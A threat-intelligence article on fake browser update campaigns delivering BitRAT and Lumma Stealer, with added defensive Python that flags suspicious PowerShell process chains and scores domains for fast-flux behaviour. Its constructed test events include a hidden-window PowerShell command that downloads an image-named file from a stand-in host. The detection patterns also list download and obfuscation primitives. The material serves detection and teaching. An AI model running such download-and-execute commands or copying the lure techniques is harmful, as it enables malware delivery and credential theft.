Fake Browser Updates Deliver BitRAT and Lumma Stealer Malware
Counterfeit browser updates have become a common vector for delivering remote access trojans (RATs) and information stealers. eSentire has documented a campaign in which fake browser update prompts distribute BitRAT and Lumma Stealer. The lure works because users expect their browser to ask for updates; it succeeds only because the victim accepts a file download from a web page, which is something no mainstream browser ever does for its own updates. That single observation underpins both the user education and the technical controls covered in this article.
Attack Chain Overview
Initial Infection Vector
The chain begins when a victim visits a compromised website into which JavaScript has been injected. That script redirects the browser to a fake update page hosted on chatgpt-app[.]cloud, styled to look like a browser's own update prompt. Two details matter for triage: the compromised site is a legitimate one acting only as a redirector, and the lure page lives on an unrelated domain whose name has nothing to do with any browser vendor. Both are visible in proxy and DNS logs before any file has been downloaded.
Delivery Mechanism
From the lure page, the browser automatically downloads a ZIP archive named "Update.zip", hosted on Discord, a service whose CDN few network filters block. The archive contains a JavaScript file, "Update.js"; a .js file opened from Explorer runs under the Windows Script Host (wscript.exe), and this one launches PowerShell. The PowerShell stage retrieves the actual payloads, BitRAT and Lumma Stealer, from a remote server, where they are served with .png extensions so that a casual look at the transfer, or a filter keyed on extension, treats them as images. The disguise is only skin deep: the files do not start with the PNG signature, and a script host spawning PowerShell that then fetches "images" is a chain worth alerting on regardless of the file names involved.
Execution and Persistence
The PowerShell scripts establish persistence on the host and drop a .NET-based loader, which is presumed to be advertised as a "malware delivery service" on the basis that it deploys both BitRAT and Lumma Stealer. For defenders the loader, not the RAT or the stealer, is the reusable component: the same loader can drop other payloads for other customers, so detections keyed on the loader's behaviour (the script host to PowerShell chain, the persistence mechanism, the image-named downloads) outlast any one payload, whereas hash- or family-based signatures have to be rewritten each time the operators change what they deliver.
Payload Analysis
BitRAT
BitRAT is a versatile RAT that offers a range of capabilities, including:
- Harvesting data
- Mining cryptocurrency
- Downloading additional binaries
- Remotely controlling infected hosts
Lumma Stealer
Lumma Stealer (also tracked as LummaC2) is a commodity stealer introduced in August 2022 and sold on the underground market for $250 to $1,000 per month. It harvests credentials, cookies and session data from web browsers, cryptocurrency wallets and similar stores. The low price and the resale value of the logs it produces have made it a default choice for criminals monetising stolen credentials, which is why it now appears behind so many unrelated delivery campaigns.
Techniques for Distribution
Drive-by Downloads and Malvertising
Drive-by downloads and malvertising are the usual ways victims reach pages like the one above: malicious code is embedded in advertisements or injected into otherwise legitimate sites, so the visitor never has to click an obviously suspicious link. Both techniques ride on the trust users place in well-known brands and services, and both give a campaign reach without the per-victim effort of phishing e-mail.
ClearFake Campaign
A new ClearFake variant goes a step further and has the victim run the malicious code by hand. The lure page claims a root certificate must be installed to fix a display problem and instructs the user to copy an obfuscated PowerShell snippet and paste it into a console; once executed, the code downloads and installs LummaC2. Because the browser never writes an executable or script to disk, download scanning and attachment filters see nothing. The remaining artefacts are a PowerShell process started from the user's shell (Explorer) with an encoded or hidden-window command line, and the network fetch that follows, so that is where detection has to look.
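Both delivery patterns, the Update.zip/Update.js chain from the attack-chain section and the ClearFake paste-and-run variant just described, leave the same kind of trace: a PowerShell process whose parent and command line do not belong together. The rules below are an added example (not eSentire's, Silent Push's or the page's code) that encode those traces and run them over constructed Sysmon-style process events; every path, URL, domain and command line in the sample data is made up for illustration and is not an indicator from the reports.

```python
"""Added example (not the page's code): process-creation rules for the two
delivery patterns described above, run over constructed sample events.

Event fields mirror Sysmon Event ID 1 / EDR process telemetry. All paths,
URLs and command lines below are made up for illustration, not real IOCs.
"""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
SCRIPT_FILE = re.compile(r"\.(js|jse|vbs|vbe|wsf|hta)(?=[\s\"']|$)", re.I)
USER_WRITABLE = re.compile(r"\\(Users|Temp|Downloads|AppData)\\", re.I)
DOWNLOAD_PRIMITIVE = re.compile(
    r"(Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b|Invoke-RestMethod|"
    r"DownloadString|DownloadFile|Start-BitsTransfer|Net\.WebClient)", re.I)
IMAGE_URL = re.compile(r"https?://\S+?\.(png|jpg|jpeg|gif)(?![\w.])", re.I)
# Markers of the "copy this into a console and press Enter" style of one-liner.
OBFUSCATED = re.compile(
    r"(-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}|FromBase64String|"
    r"-w(indowstyle)?\s+hidden|Invoke-Expression|\biex\b)", re.I)
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"


def basename(path):
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def flag_event(ev):
    """Return the list of rule names an event triggers (empty if benign)."""
    image, parent = basename(ev["image"]), basename(ev["parent_image"])
    cl = ev["command_line"]
    hits = []
    # Update.zip -> Update.js: a script host runs a script from a user-writable path.
    if image in SCRIPT_HOSTS and SCRIPT_FILE.search(cl) and USER_WRITABLE.search(cl):
        hits.append("script host executing script from user-writable path")
    # Update.js -> PowerShell: the stager's next stage.
    if image in POWERSHELL and parent in SCRIPT_HOSTS:
        hits.append("PowerShell spawned by script host")
    # PowerShell fetching a file named like an image (payloads disguised as PNGs).
    if image in POWERSHELL and DOWNLOAD_PRIMITIVE.search(cl) and IMAGE_URL.search(cl):
        hits.append("PowerShell downloading image-named file")
    # ClearFake-style paste-and-run: PowerShell launched straight from Explorer
    # with an encoded or hidden-window command line.
    if image in POWERSHELL and parent == "explorer.exe" and OBFUSCATED.search(cl):
        hits.append("obfuscated PowerShell launched from Explorer")
    return hits


def flag_events(events):
    """Map event id -> triggered rules, for events that triggered at least one."""
    out = {}
    for ev in events:
        hits = flag_event(ev)
        if hits:
            out[ev["id"]] = hits
    return out


def disguised_png(filename, data):
    """True when a file named *.png lacks the PNG signature (payload in disguise)."""
    return filename.lower().endswith(".png") and not data.startswith(PNG_MAGIC)


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
FAKE_B64 = "QUJD" * 16  # constructed stand-in for an encoded command blob
SAMPLE_EVENTS = [  # constructed telemetry, not real logs
    {"id": 1, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "command_line": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\Downloads\Update\Update.js"'},
    {"id": 2, "parent_image": r"C:\Windows\System32\wscript.exe", "image": PS,
     "command_line": r'powershell.exe -w hidden -ep bypass -c "iwr https://files.example/u/a.png -OutFile $env:TEMP\a.png"'},
    {"id": 3, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Git\cmd\git.exe", "command_line": "git pull"},
    {"id": 4, "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": r"powershell.exe -File C:\Scripts\backup.ps1"},  # admin script, nothing encoded
    {"id": 5, "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": f"powershell.exe -w hidden -e {FAKE_B64}"},
]

if __name__ == "__main__":
    for event_id, rules in flag_events(SAMPLE_EVENTS).items():
        print(event_id, rules)
    print(disguised_png("a.png", b"MZ\x90\x00" + b"\x00" * 60))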
Rise of Information Stealers
Prevalence of Lumma Stealer
Lumma Stealer now sits alongside RedLine and Raccoon among the most widely used information stealers. Its growth in 2023 shows up in marketplace data: logs obtained with LummaC2 and offered for sale rose 110% between Q3 and Q4 2023. The stealer is not technically novel; its position rests on the low subscription price and the steady demand for fresh credential and session logs, which keeps operators feeding it through campaigns like the fake-update chain above.
Use of Webhards for Malware Distribution
The AhnLab Security Intelligence Center (ASEC) reports a separate campaign that uses webhards (online file-sharing and storage services) to distribute trojanised installers for adult games and pirated software. The installers drop Orcus RAT, the XMRig cryptocurrency miner, the 3proxy proxy server and XWorm. No exploit is needed: users looking for pirated content already expect to dismiss security warnings and run unsigned installers, and the webhard hosting gives the attackers a large audience and a distribution channel that is harder to take down than a single attacker-owned site.
Additional Findings
PrivateLoader and TaskLoader
Pirated-software sites are also major distribution points for the loaders PrivateLoader and TaskLoader, which operate on a pay-per-install (PPI) basis: other criminals pay the loader operator per infected machine to have their own payloads installed. The sites supply a steady stream of users who are already willing to run unsigned executables, which is what makes the model scalable; a single loader infection can therefore end with several unrelated families on the same host.
CryptoChameleon’s Evasion Techniques
Silent Push reports that the CryptoChameleon phishing kit relies on DNSPod[.]com nameservers and fast-flux techniques, rotating the IP addresses behind a single domain at high frequency. The practical effect is that an IP observed today is stale tomorrow: blocklists built from yesterday's indicators of compromise (IOCs) miss the live infrastructure, and resolving a domain twice returns different answers. Detection therefore has to key on behaviour (many distinct addresses with short TTLs for one name, often spread across unrelated networks) and on domain and nameserver pivots rather than on any single IP. Note that DNSPod is a legitimate, widely used DNS provider; its nameservers are a hunting pivot for this campaign, not an indicator on their own.
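The behaviour-based detection described above can be scored directly from resolver or passive-DNS logs. The following is an added example (not Silent Push's or the page's code) that flags a name as fast-flux when it is seen at many distinct addresses across many /24 networks within a short window and with low TTLs, while excluding addresses on known CDN prefixes, since a CDN also answers with many short-lived addresses. The domains, observations, thresholds and CDN prefix list are all constructed for illustration; 100.64.0.0/10 and RFC 5737 addresses are used so that no real host is named.

```python
"""Added example (not the page's code): scoring domains for fast-flux behaviour
from passive-DNS style observations. All data and thresholds are constructed."""
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta


def slash24(ip):
    return str(ipaddress.ip_network(f"{ip}/24", strict=False))


def max_ips_in_window(obs, window):
    """Largest number of distinct IPs seen for one name inside any `window`."""
    obs = sorted(obs, key=lambda o: o[2])
    best = 0
    for i, (_, _, start) in enumerate(obs):
        seen = set()
        for ip, _, ts in obs[i:]:
            if ts - start > window:
                break
            seen.add(ip)
        best = max(best, len(seen))
    return best


def score_domain(obs, window, cdn_nets):
    ips = {ip for ip, _, _ in obs}
    on_cdn = sum(any(ipaddress.ip_address(ip) in n for n in cdn_nets) for ip in ips)
    return {
        "ips_in_window": max_ips_in_window(obs, window),
        "distinct_24s": len({slash24(ip) for ip in ips}),
        "mean_ttl": sum(ttl for _, ttl, _ in obs) / len(obs),
        "cdn_fraction": on_cdn / len(ips),
    }


def find_fast_flux(observations, window=timedelta(hours=24), min_ips=8,
                   min_24s=4, max_ttl=300, cdn_prefixes=()):
    """observations: (domain, ip, ttl_seconds, iso_timestamp) tuples.
    The thresholds are assumptions; tune them against your own resolver logs."""
    cdn_nets = [ipaddress.ip_network(p) for p in cdn_prefixes]
    grouped = defaultdict(list)
    for domain, ip, ttl, ts in observations:
        grouped[domain].append((ip, ttl, datetime.fromisoformat(ts)))
    verdicts = {}
    for domain, obs in grouped.items():
        s = score_domain(obs, window, cdn_nets)
        # Many addresses, spread over many networks, with short TTLs, and not
        # explained by a known CDN: the fast-flux signature.
        s["fast_flux"] = (s["ips_in_window"] >= min_ips and s["distinct_24s"] >= min_24s
                          and s["mean_ttl"] <= max_ttl and s["cdn_fraction"] < 0.5)
        verdicts[domain] = s
    return verdicts


_T0 = datetime(2024, 6, 1, 0, 0)


def _series(domain, ips, ttl, step_minutes):
    return [(domain, ip, ttl, (_T0 + timedelta(minutes=i * step_minutes)).isoformat())
            for i, ip in enumerate(ips)]


CDN_PREFIXES = ("203.0.113.0/24",)  # stand-in for a real CDN allow-list
OBSERVATIONS = (  # constructed data: flux domain, CDN-hosted site, stable intranet host
    _series("wallet-verify.example", [f"100.64.{n}.{n + 20}" for n in range(1, 13)], 60, 30)
    + _series("assets.cdn-site.example", [f"203.0.113.{n}" for n in range(10, 20)], 30, 10)
    + _series("intranet.corp.example", ["192.0.2.10"] * 6, 3600, 240)
)

if __name__ == "__main__":
    for domain, s in find_fast_flux(OBSERVATIONS, cdn_prefixes=CDN_PREFIXES).items():
        print(domain, s)
```

The CDN exclusion is the part that keeps this usable: without it, every large content network in the organisation's traffic would score as fast flux. In production the prefix list would come from the CDN providers' published ranges, and the nameserver for each flagged domain would be recorded as an additional pivot, bearing in mind that a legitimate provider such as DNSPod hosts far more benign zones than malicious ones.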
Remediation Steps
- Update Software Regularly: Ensure all software, including browsers and operating systems, is up to date with the latest security patches, using each product's built-in updater. A web page offering a browser update for download is fake by definition.
- Enable Anti-Malware Protection: Use reputable anti-malware software to detect and block malicious downloads and activity, and make sure it inspects file content rather than trusting the extension, since the payloads in this campaign travel as ".png" files.
- Educate Users: Train users to recognise and avoid phishing attempts and fake update prompts, and in particular that browsers update themselves and never ask for a ZIP or script to be run, and that no legitimate support page asks for code to be pasted into a console.
- Disable Automatic Downloads: Configure browsers to prevent automatic downloading of files from untrusted sources, and treat archives and script files (.js, .vbs) arriving through the browser as untrusted. Associating .js and .vbs with Notepad instead of the Windows Script Host stops the Update.js stage outright for ordinary users.
- Implement Network Security Measures: Use firewalls and intrusion detection systems to monitor and control network traffic, and keep DNS and proxy logs, since the redirect to the lure domain, the Discord download and the "image" fetches are all visible there before the endpoint raises an alert.
- Regular Backups: Perform regular backups of important data, kept offline or immutable, so recovery is possible even when a RAT operator has had full control of the host.
- Restrict PowerShell Execution: Limit interactive PowerShell to trusted administrators, enable script block and module logging, and use Constrained Language Mode or application control for standard users. The execution policy is not a security boundary, as it can be overridden from the command line, so logging and application control are the controls that matter.